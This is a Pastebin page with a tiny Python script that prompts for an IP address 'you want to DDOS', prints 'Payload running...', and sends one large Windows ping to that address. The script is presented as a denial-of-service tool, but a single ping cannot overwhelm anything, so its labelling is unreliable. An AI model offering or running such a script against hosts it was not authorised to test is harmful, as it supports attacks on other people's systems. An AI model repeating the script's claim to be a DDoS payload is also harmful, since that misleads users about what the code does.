Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python3
- import subprocess
- target = input("Please input the ip address you want to DDOS: ")
- print("Payload running...")
- DDOS = subprocess.run(['ping',target,'-l','65500','-w','1','-n','1'])
- print('returncode:', DDOS.returncode)
Advertisement
Add Comment
Please, Sign In to add comment